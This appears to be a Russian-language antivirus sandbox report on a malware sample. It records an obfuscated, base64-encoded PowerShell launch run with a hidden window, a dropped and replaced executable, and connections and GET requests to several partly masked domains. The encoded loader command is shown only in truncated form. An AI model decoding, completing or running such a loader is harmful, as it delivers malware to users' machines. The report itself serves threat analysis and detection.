Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAG8AMQByAHoAYwA2AD0AKAAoACcASwB6ACcAKwAnADcAYgAnACkAKwAnAHoAJwArACcAbgBiACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgBWADoAdQBzAGUAUgBwAFIATwBGAGkATABFAFwAeABtAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1980
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1256229.cvr
- %HOMEPATH%\xmejmeo\txfhu9z\d3coi0.exe
Удаляет следующие файлы
- %HOMEPATH%\xmejmeo\txfhu9z\d3coi0.exe
Подменяет следующие файлы
- %HOMEPATH%\xmejmeo\txfhu9z\d3coi0.exe
Сетевая активность
Подключается к
- 'va###ast.com':80
- 'va##rast.de':80
- 'va###oda.com':80
- 'wa###-tanka.org':80
- 'we####t4christ.org':443
- 'wh####on-rice.com':80
- 'za#####t-flensburg.com':80
- 'za#####t-flensburg.info':443
TCP
Запросы HTTP GET
- http://va###ast.com/bleech/fR/
- http://www.va##rast.de/bleech/fR/
- http://va###oda.com/cgi-bin/897/
- http://wa###-tanka.org/Kleinteile/E/
- http://wh####on-rice.com/Logos/U/
- http://za#####t-flensburg.com/cgi-bin/L8/
Другие
- 'za#####t-flensburg.info':443
UDP
- DNS ASK vi#####ecoracion.com
- DNS ASK va###ast.com
- DNS ASK va##rast.de
- DNS ASK va###oda.com
- DNS ASK wa###-tanka.org
- DNS ASK we####t4christ.org
- DNS ASK wh####on-rice.com
- DNS ASK za#####t-flensburg.com
- DNS ASK za#####t-flensburg.info
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAG8AMQByAHoAYwA2AD0AKAAoACcASwB6ACcAKwAnADcAYgAnACkAKwAnAHoAJwArACcAbgBiACcAKQA7ACYAKAAnAG4AZQB3AC0AaQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAGUATgBWADoAdQBzAGUAUgBwAFIATwBGAGkATABFAFwAeABtAE...' (со скрытым окном)
